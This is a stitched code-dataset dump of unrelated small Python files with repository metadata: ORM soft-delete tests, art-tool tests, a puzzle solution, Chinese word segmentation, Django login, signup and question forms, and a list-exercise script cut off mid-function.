] | permissive | mattcl/orator | f6cfb687ef8f1c3f5dd9828b2b950edbb5387cc9 | cc3d2154d596f7e6ff4274d7f8d6e8a233e12a9c | refs/heads/0.8 | 2021-01-20T17:27:16.342669 | 2016-06-02T21:55:00 | 2016-06-02T21:55:00 | 66,998,160 | 0 | 1 | null | 2018-02-22T21:29:24 | 2016-08-31T03:08:13 | Python | UTF-8 | Python | false | false | 1,362 | py | # -*- coding: utf-8 -*-
import datetime
import arrow
from flexmock import flexmock, flexmock_teardown
from orator import Model, SoftDeletes
from orator.orm import Builder
from orator.query import QueryBuilder
from ... import OratorTestCase
# Frozen "now" timestamp (naive datetime) shared by the stub and assertions below.
t = arrow.get().naive
class SoftDeletesTestCase(OratorTestCase):
    """Tests for the SoftDeletes mixin using flexmock expectations."""

    def tearDown(self):
        # Verify and remove all flexmock expectations after each test.
        flexmock_teardown()

    def test_delete_sets_soft_deleted_column(self):
        # delete() must issue an UPDATE that sets deleted_at, not a DELETE.
        model = flexmock(SoftDeleteModelStub())
        model.set_exists(True)
        builder = flexmock(Builder)
        query_builder = flexmock(QueryBuilder(None, None, None))
        query = Builder(query_builder)
        model.should_receive('new_query').and_return(query)
        builder.should_receive('where').once().with_args('id', 1).and_return(query)
        builder.should_receive('update').once().with_args({'deleted_at': t})
        model.delete()
        self.assertIsInstance(model.deleted_at, datetime.datetime)

    def test_restore(self):
        # restore() must clear deleted_at and persist via save().
        model = flexmock(SoftDeleteModelStub())
        model.set_exists(True)
        model.should_receive('save').once()
        model.restore()
        self.assertIsNone(model.deleted_at)
class SoftDeleteModelStub(SoftDeletes, Model):
def get_key(self):
return 1
def get_key_name(self):
return 'id'
def from_datetime(self, value):
return t
| [
"sebastien.eustace@gmail.com"
] | sebastien.eustace@gmail.com |
b3a14ad9c4108e17bf88773fdbcbf986824b12e7 | f7cd9d1687d1450ea73d7a8d9e0d02e5d0480e56 | /tests/test_ideas_factory.py | b9312e38cfb78b1282394a7b6a1c8a5c38cd27dc | [] | no_license | kjbyleni/My_Art_tools | 5424b1bbbdf98fba526fe0db74d3999d188753cc | 1146eb23b99c4b2474d26cdf7882e3c468d6327e | refs/heads/master | 2020-09-02T14:01:13.977622 | 2020-04-17T02:14:54 | 2020-04-17T02:14:54 | 219,237,054 | 0 | 0 | null | 2019-11-16T14:32:08 | 2019-11-03T01:39:15 | Python | UTF-8 | Python | false | false | 1,227 | py | import ideas.factory as idea_factory
import os
def test_items_keys():
item_obj = idea_factory.get_items()
assert item_obj.keys == ['items']
def test_items_context():
item_obj = idea_factory.get_items()
assert item_obj.context == 'Items'
def test_character_keys():
char_obj = idea_factory.get_character()
assert char_obj.keys == ['shapes', 'physical nature', 'distinguishing characteristic']
def test_character_context():
char_obj = idea_factory.get_character()
assert char_obj.context == 'Character'
def test_env_keys():
env_obj = idea_factory.get_env()
assert env_obj.keys == ['season', 'time', 'inside', 'outside']
def test_env_context():
env_obj = idea_factory.get_env()
assert env_obj.context == 'Environment'
def test_study_keys():
env_obj = idea_factory.get_study()
assert env_obj.keys == ['study', 'anatomy', 'emotion']
def test_study_context():
env_obj = idea_factory.get_study()
assert env_obj.context == 'Study'
def test_exercise_keys():
env_obj = idea_factory.get_exercise()
assert env_obj.keys == ['exercise']
def test_exercise_context():
env_obj = idea_factory.get_exercise()
assert env_obj.context == 'Exercise'
| [
"kjbyleni@gmail.com"
] | kjbyleni@gmail.com |
c509a6a274f2750ee9c99e6d66b55a16e7ca1505 | 481ba835ba4233ecf0c402d022593863f7569fe6 | /rps/feature_tests/steps/rp14a_steps.py | e9ac486012bca1a59c4445c6275db55edbba96dd | [] | no_license | InsolvencyService/rps-alpha | 4e9830b6fd98569b567086a626de7f102c34658d | 35d8ad405f780df722087b77713875dd53588836 | refs/heads/master | 2021-06-03T00:57:53.729646 | 2018-12-11T14:48:26 | 2018-12-11T14:48:26 | 13,813,519 | 0 | 2 | null | 2013-12-16T11:41:14 | 2013-10-23T20:11:21 | Python | UTF-8 | Python | false | false | 241 | py | from hamcrest import *
from BeautifulSoup import BeautifulSoup
from insolvency_practitioner_forms import routes
ip_routes_app = routes.app
@given('the IP app is running')
def step(context):
context.client = ip_routes_app.test_client()
| [
"legionsofbob@gmail.com"
] | legionsofbob@gmail.com |
af332a236823d827a64916a5d5d0c8c6f302da93 | 0668404b877fb65d61f1131ea7529dda622286c8 | /Competitive Prog/Hackerearth/CodeJam1.py | ff00cbfbf8d896eea3bcad0e82aa28ece2d3f56d | [] | no_license | nikhiljsk/Programming | 1137128f787ccd5eef45f8aff91128f740195592 | 8226c2320809d252eb3a49149044c0cd217391b4 | refs/heads/master | 2020-05-03T21:50:56.230712 | 2020-02-28T10:18:22 | 2020-02-28T10:18:22 | 178,832,071 | 0 | 0 | null | 2020-02-20T12:33:26 | 2019-04-01T09:41:38 | HTML | UTF-8 | Python | false | false | 363 | py | T=int(input())
list=[]
for k in range(T):
n=int(input())
arr=[int(x) for x in input().split()]
if len(arr)%2==0:
mid=arr[(len(arr)//2)-1]
else:
mid=arr[len(arr)//2]
if mid<max(arr):
list.append("NO")
else:
list.append("YES")
for i in range(T):
print("Case #",i+1,": ",list[i],sep="")
| [
"nikhiljs@in.ibm.com"
] | nikhiljs@in.ibm.com |
a48f9ce7134339daba69ce77b2e663a22115549f | 37b0463cff838bac87ad1022313f67bcb81574d3 | /NCRE/5/PY103.py | 171f4a109c753fec5daf1800a8313055c1f9571e | [] | no_license | NekoPlusPro/pythonProject | b9433822d53e94a09baa2335dcc8375d90424e55 | a0fa93c072a4952f06e55d9a617f4b3f3e38dd99 | refs/heads/master | 2023-08-24T15:04:15.591663 | 2021-10-15T07:07:53 | 2021-10-15T07:07:53 | 389,867,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | import jieba
s = input("请输入一个中文字符串,包含标点符号:")
m =jieba.lcut(s)
print("中文词语数:{}".format(len(m)))
| [
"jiax_chen@outlook.com"
] | jiax_chen@outlook.com |
067db6a7d37d2731fadc3e9a13608743f89b927e | 174175047154ee1afb4699c6f6073bcfd506b7f9 | /blog/forms.py | adc72623ff4fce416568d8db7ce502cd921c85e7 | [] | no_license | RusPatrick/webweb | e19f9d15008dcfba14cef0e139487e171dee94e4 | 9f7c88bc358e88e95c0c17f7984207a0a408cd84 | refs/heads/master | 2020-03-18T03:57:43.814834 | 2018-05-21T20:24:41 | 2018-05-21T20:24:41 | 134,264,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,622 | py | from django import forms
from django.forms import ModelForm
from django.core.exceptions import ValidationError
from blog.models import *
import re
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm
class SignInForm(AuthenticationForm):
    """Login form with Bootstrap-styled username/password widgets."""
    # Override AuthenticationForm's fields to attach CSS class/placeholder.
    username = forms.CharField(widget=forms.TextInput(attrs={
        'class': 'form-control',
        'placeholder': 'Login'
    }))
    password = forms.CharField(widget=forms.PasswordInput(attrs={
        'class': 'form-control',
        'placeholder': 'Password'
    }))

    def clean_username(self):
        # Field-level check that the account exists.
        # NOTE(review): this discloses account existence to an attacker —
        # confirm that is acceptable for this application.
        data = self.cleaned_data.get('username')
        if Profile.objects.filter(username=data).first() is None:
            raise ValidationError('User does not exist.')
        else:
            return data;
    class Meta:
        # NOTE(review): AuthenticationForm is not a ModelForm, so this Meta
        # (model/fields/widgets) is presumably ignored by Django — verify.
        model = Profile
        fields = ('username', 'password')
        widgets = {
            'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Login'}),
            'password': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),
        }
class SignUpForm(UserCreationForm):
    """Registration form based on Django's UserCreationForm.

    Adds Bootstrap styling to the password fields, stores the optional
    email on the created Profile, and enforces email uniqueness.
    """
    password2 = forms.CharField(widget=forms.PasswordInput(attrs={
        'class': 'form-control',
        'placeholder': 'Confirm password'
    }))
    password1 = forms.CharField(widget=forms.PasswordInput(attrs={
        'class': 'form-control',
        'placeholder': 'Password'
    }))

    def clean_email(self):
        """Allow an empty email; a non-empty one must be unused."""
        email = self.cleaned_data.get('email')
        if email == '':
            return ''
        else:
            if Profile.objects.filter(email=email).first() is None:
                return email
            else:
                raise ValidationError('User with this email already exists.')

    def save(self, commit=True):
        # Fix: the previous implementation called super().save() twice, which
        # ran the whole UserCreationForm save pipeline (including password
        # hashing) a second time. Build the instance once, set the email,
        # then commit explicitly.
        user = super(SignUpForm, self).save(commit=False)
        user.email = self.cleaned_data.get('email')
        if commit:
            user.save()
            self.save_m2m()  # provided by ModelForm.save(commit=False)
        return user

    class Meta:
        model = Profile
        fields = ('username', 'password1', 'password2', 'avatar', 'email')
        widgets = {
            'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Login'}),
            'password1': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),
            'password2': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirm password'}),
            'email': forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email'}),
        }
class AnswerForm(ModelForm):
    """Form for posting an answer: a single styled textarea."""
    class Meta:
        model = Answer
        fields = ['text']
        widgets = {
            'text': forms.Textarea(attrs={'class': 'form-control',
                                          'rows': 5,
                                          'placeholder': 'Write your answer here'}),
        }
class AskForm(ModelForm):
    """Question form with a free-text tags field (0-3 space/comma-separated tags)."""
    tagsInput = forms.CharField(
        required=False,
        help_text='Input 0 to 3 tags separated by space each less than 15 characters.',
        widget=forms.TextInput(attrs={
            'class': 'form-control',
            'placeholder': 'Tags'
        })
    )
    class Meta:
        model = Question
        fields = ['title', 'text']
        widgets = {
            'text': forms.Textarea(attrs={
                'class': 'form-control',
                'rows': 10,
                'placeholder': 'Write your question here'
            }),
            'title': forms.TextInput(attrs={
                'class': 'form-control',
                'placeholder': 'Title'
            })
        }

    def clean_tagsInput(self):
        """Normalize whitespace, validate the 0-3 tag format, return a tag list."""
        data = self.cleaned_data.get('tagsInput')
        data = data.strip()
        # collapse runs of whitespace to a single space
        data = re.sub("\s{2,}", " ", data)
        pattern = "^\s*(\w+,?\s*){0,3}$"
        if re.match(pattern, data):
            # split on commas and/or whitespace; empty input yields ['']
            tags = re.split(",+\s*|\s+", data)
        else:
            raise ValidationError('Invalid format.')
        for tag in tags:
            if len(tag) >= 15:
                raise ValidationError('Tag is too long.')
        return tags

    def save(self, commit=True):
        # NOTE(review): the first super().save(commit=True) always commits so
        # the instance has a pk before the M2M adds — the commit parameter is
        # effectively ignored and the model is saved twice. Confirm no caller
        # relies on commit=False before changing this.
        tags = self.cleaned_data.get('tagsInput')
        super(AskForm, self).save(commit=True)
        for tag in tags:
            if tag != '':
                obj, created = Tag.objects.get_or_create(name=tag)
                self.instance.tags.add(obj)
        return super(AskForm, self).save(commit=commit)
class EditProfileForm(ModelForm):
    """Form for editing an existing Profile (username, email, avatar)."""
    class Meta:
        model = Profile
        fields = ['username', 'email', 'avatar']
        widgets = {
            'username': forms.TextInput(attrs={
                'class': 'form-control',
                'placeholder': 'Login'
            }),
            'email': forms.EmailInput(attrs={
                'class': 'form-control',
                'placeholder': 'Email'
            }),
        }
    def clean_email(self):
        """Allow clearing the email; otherwise it must be unused or belong
        to the profile being edited."""
        email = self.cleaned_data.get('email')
        if email == '':
            # NOTE(review): SignUpForm.clean_email returns '' here while
            # this form returns None — confirm the asymmetry is intended.
            return None
        else:
            u = Profile.objects.filter(email=email).first()
            if u is None or u.username == self.cleaned_data.get('username'):
                return email
            else:
                raise ValidationError('User with this email already exists.')
| [
"farrahov95@mail.ru"
] | farrahov95@mail.ru |
fc65e98b5359b427bc37ea833f866504ae8226cd | 8a5b77c7f36315f87eb163fdf51ae98f683bae91 | /cvd_algorithm_v0.3/procedure/converting_to_hash.py | 6b4a22eaef862717151a662cedf0bff219392a5a | [] | no_license | Poetickz/color_vision_deficiency | 9c237ae657c65d243ff58c23e1c47996999e59c3 | 2b3fa9fe1a666455ba7458cd95fa483fb8e75f07 | refs/heads/master | 2021-01-16T12:26:49.153036 | 2020-05-18T04:47:15 | 2020-05-18T04:47:15 | 243,120,286 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py |
def get_hsl_from_file(file):
    """Parse a whitespace-separated "<int> <float>" file into a dict.

    Each non-empty line must contain an integer key followed by a float
    value; returns {key: value}.
    """
    # BUGFIX: the original opened the file and never closed it; the
    # context manager guarantees the handle is released.
    with open(file, "r") as f:
        lines = f.readlines()
    data = {}
    for line in lines:
        parts = line.split()
        data[int(parts[0])] = float(parts[1])
    return data
# Script: read resume_hsl.txt and rewrite it into hash_hsl.txt as
# "hue:intensity" pairs, 10 entries per line.
f = open("hash_hsl.txt","w+")
data = get_hsl_from_file("resume_hsl.txt")
cont = 0
for hue, intensity_array in data.items():
    if (cont == 10):
        # start a new row after every 10 entries
        f.write("\n")
        cont = 0
    f.write(str(hue)+":"+str(intensity_array)+", ")
    cont += 1
f.close()
"alan.rocha@udem.edu"
] | alan.rocha@udem.edu |
35c250eabd05a89ce60377c5d21af072fff01915 | ee33c593dd690122705e6597e81c5580b43ff88f | /214. Shortest Palindrome.py | 314bea03c78e485c4a783cebbae9e8a83054cf61 | [] | no_license | xsu100/LeetCode_python | a8e652cc80cada9f2c4c38ac586453aa0b89e25f | f1701f18dca4238aa4ac4d54142b16397053a50f | refs/heads/master | 2020-04-06T07:11:45.815427 | 2016-09-08T03:18:47 | 2016-09-08T03:18:47 | 63,474,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | class Solution(object):
def doNext(self, s):
next = [0]
for i in range(1, len(s)):
j = next[i-1]
while j and s[i] != s[j]:
j = next[j-1]
next.append(j + 1 if s[i] == s[j] else 0)
return next
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
if s == s[::-1]:
return s
next = self.doNext(s + "#" + s[::-1])
return s[next[-1]:][::-1] + s | [
"suxing.main@gmail.com"
] | suxing.main@gmail.com |
d5fd16ef715a4dc1067eba05edae77d187a5af47 | c3829a2e0de7e67ca5eb588c2ae63bb8854829dd | /train_9.py | a68e903dfd6d6210b24b3748138664be22a1fa5e | [] | no_license | gikr/paac_corrected2 | ea6baca7e184942ee1ba08b8063b08fc858b0918 | a5dd0e76337acab735585048d7df533545567104 | refs/heads/master | 2020-03-20T19:28:24.991558 | 2018-11-14T08:42:31 | 2018-11-14T08:42:31 | 137,639,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,776 | py | import argparse
import logging
import os
import signal
import sys
import torch
#from emulators import VizdoomGamesCreator, AtariGamesCreator
from emulators import TLabyrinthCreator
import utils
import utils.evaluate as evaluate
#from networks import vizdoom_nets, atari_nets
from batch_play import ConcurrentBatchEmulator, SequentialBatchEmulator, WorkerProcess
#import multiprocessing
from networks import tlab_nets, tlab_nets_little
from paac import PAACLearner_9
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
FF_HISTORY_WINDOW=4
LSTM_HISTORY_WINDOW=1
ARGS_FILE='args.json'
def args_to_str(args):
    """Render the parsed argument namespace as a readable multi-line string."""
    arg_map = vars(args)
    rendered = ['', 'ARGUMENTS:']
    rendered.extend(' "{0}": {1}'.format(name, arg_map[name])
                    for name in sorted(arg_map.keys()))
    return os.linesep.join(rendered)
# Most recently registered cleanup callback; re-applied on every call.
exit_handler = None


def set_exit_handler(new_handler_func=None):
    """(Re)install the stored exit handler for SIGINT and SIGTERM.

    Creating a Vizdoom game (which starts a new subprocess) drops all
    previously set signal handlers, so this is called again right after
    game creation to restore them.
    """
    global exit_handler
    if new_handler_func is not None:
        exit_handler = new_handler_func
    if not exit_handler:
        return
    print('set up exit handler!')
    signal.signal(signal.SIGINT, exit_handler)
    signal.signal(signal.SIGTERM, exit_handler)
def concurrent_emulator_handler(batch_env):
    """Build a signal handler that shuts down *batch_env* cleanly.

    The handler only acts in the process that created it — worker
    subprocesses inherit the handler but must not run the cleanup.
    """
    logging.debug('setup signal handler!!')
    owner_pid = os.getpid()

    def signal_handler(signal, frame):
        if os.getpid() != owner_pid:
            return
        logging.info('Signal ' + str(signal) + ' detected, cleaning up.')
        batch_env.close()
        logging.info('Cleanup completed, shutting down...')
        sys.exit(0)

    return signal_handler
def eval_network(len_int, network, env_creator, num_episodes, is_recurrent, greedy=False):
    """Evaluate *network* over *num_episodes* sequential episodes.

    The emulator is always closed and the exit handler reinstalled, even
    when the evaluation raises.
    """
    batch_emulator = SequentialBatchEmulator(env_creator, num_episodes, False)
    try:
        print(network, batch_emulator)
        print("accepted length", len_int)
        stats = evaluate.stats_eval(network, len_int, batch_emulator,
                                    is_recurrent=is_recurrent, greedy=greedy)
    finally:
        batch_emulator.close()
        # emulator creation can drop signal handlers; restore them
        set_exit_handler()
    return stats
def main(args):
    """Build the environment/network creators, start the worker processes
    and run PAAC training; always closes the batch emulator on exit."""
    network_creator, env_creator = get_network_and_environment_creator(args)
    # Persist the full argument set so runs are reproducible.
    utils.save_args(args, args.debugging_folder, file_name=ARGS_FILE)
    logging.info('Saved args in the {0} folder'.format(args.debugging_folder))
    logging.info(args_to_str(args))
    batch_env = ConcurrentBatchEmulator(WorkerProcess, env_creator, args.num_workers, args.num_envs)
    # Make sure Ctrl-C / SIGTERM tear down the worker processes.
    set_exit_handler(concurrent_emulator_handler(batch_env))
    try:
        batch_env.start_workers()
        learner = PAACLearner_9(network_creator, batch_env, args)
        learner.set_eval_function(eval_network,
                                  learner.network, env_creator, 50, learner.use_rnn)  # args to eval_network
        learner.train()
    finally:
        batch_env.close()
def get_network_and_environment_creator(args, random_seed=None):
    """Build a (network_creator, env_creator) pair from the parsed args.

    Args:
        args: parsed argument namespace; mutated in place
            (``history_window`` and ``random_seed`` are set here).
        random_seed: optional explicit seed to store on ``args``;
            when omitted a default of 3 is used if none is set yet.
    """
    if args.arch == 'lstm':
        args.history_window = LSTM_HISTORY_WINDOW
    elif args.arch == 'ff':
        args.history_window = FF_HISTORY_WINDOW
    # BUGFIX: the original assigned 3 whenever random_seed was passed,
    # silently discarding the caller's explicit seed.
    if random_seed is not None:
        args.random_seed = random_seed
    elif not hasattr(args, 'random_seed'):
        args.random_seed = 3
    # NOTE(review): env_creator/Network remain unbound when args.framework
    # is neither 'T_lab' nor 'T_lab_little' (NameError below) — confirm
    # the argparse sub-commands make other values impossible.
    if args.framework == 'T_lab':
        env_creator = TLabyrinthCreator(args)
        Network = tlab_nets[args.arch]
    if args.framework == 'T_lab_little':
        env_creator = TLabyrinthCreator(args)
        Network = tlab_nets_little[args.arch]
    device = args.device
    print(env_creator)
    num_actions = env_creator.num_actions
    obs_shape = env_creator.obs_shape

    def network_creator():
        # Closure so the learner can build (and rebuild) the network lazily.
        if device == 'gpu':
            network = Network(num_actions, obs_shape, torch.cuda)
            network = network.cuda()
            logging.debug("Moved network's computations on a GPU")
        else:
            network = Network(num_actions, obs_shape, torch)
        return network

    print('i am here', network_creator, env_creator)
    return network_creator, env_creator
def add_paac_args(parser, framework):
    """Register all PAAC hyper-parameter options on *parser*.

    *framework* selects which network registry supplies the --arch choices.
    """
    # Prefer the GPU when CUDA is available.
    devices = ['gpu', 'cpu'] if torch.cuda.is_available() else ['cpu']
    default_device = devices[0]
    nets = tlab_nets if framework == 'T_lab' else tlab_nets_little
    net_choices = list(nets.keys())
    default_workers = 8
    show_default = " [default: %(default)s]"
    parser.add_argument('-d', '--device', default=default_device, type=str, choices=devices,
                        help="Device to be used ('cpu' or 'gpu'). " +
                        "Use CUDA_VISIBLE_DEVICES to specify a particular gpu" + show_default,
                        dest="device")
    parser.add_argument('--e', default=1e-8, type=float,
                        help="Epsilon for the Rmsprop and Adam optimizers."+show_default, dest="e")
    parser.add_argument('-lr', '--initial_lr', default=1e-3, type=float,
                        help="Initial value for the learning rate."+show_default, dest="initial_lr",)
    parser.add_argument('-lra', '--lr_annealing_steps', default=100000000, type=int,
                        help="Nr. of global steps during which the learning rate will be linearly" +
                        "annealed towards zero." + show_default,
                        dest="lr_annealing_steps")
    parser.add_argument('--entropy', default=0.02, type=float,
                        help="Strength of the entropy regularization term (needed for actor-critic). "+show_default,
                        dest="entropy_regularisation_strength")
    parser.add_argument('--clip_norm', default=3.0, type=float,
                        help="If clip_norm_type is local/global, grads will be"+
                        "clipped at the specified maximum (average) L2-norm. "+show_default,
                        dest="clip_norm")
    parser.add_argument('--clip_norm_type', default="global",
                        help="""Whether to clip grads by their norm or not. Values: ignore (no clipping),
local (layer-wise norm), global (global norm)"""+show_default,
                        dest="clip_norm_type")
    parser.add_argument('--gamma', default=0.99, type=float, help="Discount factor."+show_default, dest="gamma")
    parser.add_argument('--max_global_steps', default=20000000, type=int,
                        help="Number of training steps."+show_default,
                        dest="max_global_steps")
    parser.add_argument('--max_local_steps', default=10, type=int,
                        help="Number of steps to gain experience from before every update. "+show_default,
                        dest="max_local_steps")
    parser.add_argument('-n', '--num_envs', default=32, type=int,
                        help="Number of environments to run simultaneously. "+show_default, dest="num_envs")
    parser.add_argument('-w', '--workers', default=default_workers, type=int,
                        help="Number of parallel worker processes to run the environments. "+show_default,
                        dest="num_workers")
    parser.add_argument('-df', '--debugging_folder', default='logs/', type=str,
                        help="Folder where to save training progress.", dest="debugging_folder")
    parser.add_argument('--arch', choices=net_choices, help="Which network architecture to train"+show_default,
                        dest="arch")
    parser.add_argument('--loss_scale', default=5., dest='loss_scaling', type=float,
                        help='Scales loss according to a given value'+show_default )
    parser.add_argument('--critic_coef', default=0.25, dest='critic_coef', type=float,
                        help='Weight of the critic loss in the total loss'+show_default)
def get_arg_parser():
    """Build the top-level argument parser with one sub-command per framework."""
    parser = argparse.ArgumentParser()
    framework_parser = parser.add_subparsers(
        help='An RL friendly framework for agent-environment interaction',
        dest = 'framework')
    Tlab_parser = framework_parser.add_parser('T_lab', help="Arguments for the T labyrinth")
    TLabyrinthCreator.add_required_args(Tlab_parser)
    Tlab_little_parser = framework_parser.add_parser('T_lab_little', help="Arguments for the T labyrinth")
    TLabyrinthCreator.add_required_args(Tlab_little_parser)
    # Both sub-commands share the same PAAC hyper-parameter group.
    for framework, subparser in [('T_lab', Tlab_parser), ('T_lab_little', Tlab_little_parser)]:
        paac_group = subparser.add_argument_group(
            title='PAAC arguments', description='Arguments specific to the algorithm')
        add_paac_args(paac_group, framework)
    return parser
if __name__ == '__main__':
    # Parse command-line arguments and launch training.
    args = get_arg_parser().parse_args()
    main(args)
| [
"noreply@github.com"
] | gikr.noreply@github.com |
a990b8ea1139dede145faaa6e5b5eacaf7f8467b | 23367267f320c65aead807c848b0b43b00f73235 | /2sep21db/deletecolumn.py | 45fa4378bd6dc3e33b382f83568d0de6b95a73bf | [] | no_license | GayatriMhetre21/python10aug21 | 61a51a2e27fff69251a1282ee23cecd17c80bdea | a2aaff7caa34432e95f4a9d9ee4ebb59fe5da9c0 | refs/heads/master | 2023-07-19T12:54:19.333807 | 2021-09-15T12:57:45 | 2021-09-15T12:57:45 | 394,551,723 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #-write program to delete specific row of table
import MySQLdb
try:
mycon=MySQLdb.connect(host="localhost",user="root",passwd="",database="studentdb")
print("mycon excecute")
cur=mycon.cursor()
print("cursor excecute")
query="alter table stdinform drop column moblie"
cur.execute(query)
print("excecute excecute")
print("execute query")
mycon.commit()
print(query+"column deleted successfully .... ")
except:
print("column not deleted ")
finally:
cur.close()
print("cursor connection close....")
mycon.close()
print("DB connection close....") | [
"noreply@github.com"
] | GayatriMhetre21.noreply@github.com |
24efa99c0630960c0e5bfd0f242ddb334c6ae807 | a598954ebe57595ca60387686059da19440d953f | /renren | 4ecbea4f53e9803dae47c249f3f18bb52ee0a34f | [] | no_license | dcshenyufei/buptsyf | 62068064e4bf69142f9e9ceccc32214321a1f6cc | d21d2f5737cddd46ae0395ae0750d7b88bdef1c1 | refs/heads/master | 2021-01-17T17:08:18.461384 | 2013-12-17T15:31:25 | 2013-12-17T15:31:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,903 | #!/usr/bin/env python
#encoding=utf-8
import sys
import re
import urllib2
import urllib
import cookielib
class Renren(object):
    """Minimal Renren (Chinese social network) client: logs in with a
    persisted cookie jar and prints friends' status updates. (Python 2)"""
    def __init__(self):
        self.name = self.pwd = self.content = self.domain = self.origURL = ''
        self.operate = ''  # response object of the logged-in session
        self.cj = cookielib.LWPCookieJar()
        try:
            # reuse a previously saved session cookie when available
            self.cj.revert('renren.coockie')
        except Exception,e:
            print e
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
        urllib2.install_opener(self.opener)
    def setinfo(self,username,password,domain,origURL):
        '''Set the user's login information.'''
        self.name = username
        self.pwd = password
        self.domain = domain
        self.origURL = origURL
    def login(self):
        '''Log in to renren.com; on success save the cookie and show updates.'''
        params = {'domain':self.domain,'origURL':self.origURL,'email':self.name, 'password':self.pwd}
        print 'login.......'
        req = urllib2.Request(
            'http://www.renren.com/PLogin.do',
            urllib.urlencode(params)
        )
        self.operate = self.opener.open(req)
        if self.operate.geturl() == 'http://www.renren.com/Home.do':
            print 'Logged on successfully!'
            self.cj.save('renren.coockie')
            self.__viewnewinfo()
        else:
            print 'Logged on error'
    def __viewnewinfo(self):
        '''View friends' status updates.'''
        self.__caiinfo()
    def __caiinfo(self):
        '''Scrape author/content pairs from the home page HTML and print them.'''
        h3patten = re.compile('<h3>(.*?)</h3>')  # match the enclosing block
        apatten = re.compile('<a.+>(.+)</a>:')  # match the author
        cpatten = re.compile('</a>(.+)\s')  # match the content
        infocontent = self.operate.readlines()
        # print infocontent
        print 'friend newinfo:'
        for i in infocontent:
            content = h3patten.findall(i)
            if len(content) != 0:
                for m in content:
                    username = apatten.findall(m)
                    info = cpatten.findall(m)
                    if len(username) !=0:
                        print username[0],'说:',info[0]
                        print '----------------------------------------------'
                    else:
                        continue
ren = Renren()
username = ''  # your Renren account name
password = ''  # your Renren password
domain = 'renren.com'  # Renren site domain
origURL = 'http://www.renren.com/Home.do'  # Renren post-login URL
ren.setinfo(username,password,domain,origURL)
ren.login()
主要用到了python cookielib,urllib2,urllib这3个模块,这3个模块是python做http这方面比较好的模块.
self.cj = cookielib.LWPCookieJar()
try:
self.cj.revert('renren.coockie')
except Exception,e:
print e
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
urllib2.install_opener(self.opener)
| [
"289601878@qq.com"
] | 289601878@qq.com | |
b39f13d2074aeca81ea0122e5172cb7a038e9c2b | 6c59dd487761a3d1d161d2d32680b659c26676c7 | /sexual_problems.py | 0caaf60d39af4a2bdfb1da3fd07a8001893e4377 | [
"MIT"
] | permissive | sourabhtk37/Ladyproblem-Hackthon | 7a2bdd03e49624757bef5f50dcd16ddc0ce49304 | a1b63cda5292b702c65b818605e8dab5076c5a9b | refs/heads/master | 2021-01-11T02:56:04.108589 | 2016-10-15T19:30:32 | 2016-10-15T19:30:32 | 70,905,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,364 | py | import operator
result = [{u'faceRectangle': {u'width': 220, u'top': 124, u'left': 319, u'height': 220}, u'scores': {u'sadness': 2.405169e-06, u'neutral': 0.004737595, u'contempt': 3.80436541e-05, u'disgust': 1.12454254e-05, u'anger': 2.84782072e-06, u'surprise': 4.09142376e-06, u'fear': 3.45566669e-08, u'happiness': 0.995203733}}, {u'faceRectangle': {u'width': 153, u'top': 226, u'left': 25, u'height': 153}, u'scores': {u'sadness': 0.0006249004, u'neutral': 0.9822587, u'contempt': 0.0138994809, u'disgust': 7.737188e-06, u'anger': 2.87497733e-05, u'surprise': 7.097867e-05, u'fear': 4.812748e-07, u'happiness': 0.00310896849}}]
result2=[{u'faceId': u'74559527-cfd2-4a5b-b6ce-91fb0d116fd6', u'faceRectangle': {u'width': 220, u'top': 124, u'height': 220, u'left': 319}, u'faceAttributes': {u'gender': u'male', u'age': 28.8}}, {u'faceId': u'7a737fd7-7318-4896-8ae2-e888fa33333c', u'faceRectangle': {u'width': 153, u'top': 226, u'height': 153, u'left': 25}, u'faceAttributes': {u'gender': u'male', u'age': 28.1}}]
for currFace in range(len(result)):
result1_Face = result[currFace]
faceRectangle = result1_Face['faceRectangle']
currEmotion = max(result1_Face['scores'].items(), key=operator.itemgetter(1))[0]
result2_face = result2[currFace]
age = result2_face['faceAttributes']['age']
gender = result2_face['faceAttributes']['gender']
print(currEmotion) | [
"sourabhtk37@gmail.com"
] | sourabhtk37@gmail.com |
8595a028911ac6f9661ca4adf4b81d4d4d765ec9 | 91a276499d81615ad703bd48407681694918cb5d | /students/BrianE/session03/list_lab.py | 7eae4d86ee118206fce1586745a184e950d23746 | [] | no_license | colephalen/SP_2019_210A_classroom | 2ed68fea0ffe322d2f55d4ebc5bdde6bf17ee842 | a17145bdcd235f9853f5f0c2feca20cf49df7f30 | refs/heads/master | 2020-05-07T12:08:25.854445 | 2019-06-15T03:38:45 | 2019-06-15T03:38:45 | 180,490,097 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,011 | py | #!/usr/env python3
"""
list_lab.py
"""
def display_fruits(fruits):
    """Show the current contents of the fruit list on the terminal.

    :param fruits: list of fruits
    :return: None
    """
    print(f"Current fruit: {fruits}")
def delete_fruits(fruits):
    """Prompt for a fruit name and remove its first occurrence in place.

    Prints the ValueError message when the fruit is not in the list.
    :param fruits: list of fruits (mutated)
    :return: None
    """
    print(fruits)
    fruit_to_delete = input("Enter a fruit to delete: \n\n >>>")
    try:
        position = fruits.index(fruit_to_delete)
        del fruits[position]
    except ValueError as err:
        print(err)
def cleanup_list(fruits):
    """Ask about each fruit and drop the ones the user dislikes.

    Re-prompts until the answer is exactly 'yes' or 'no'.
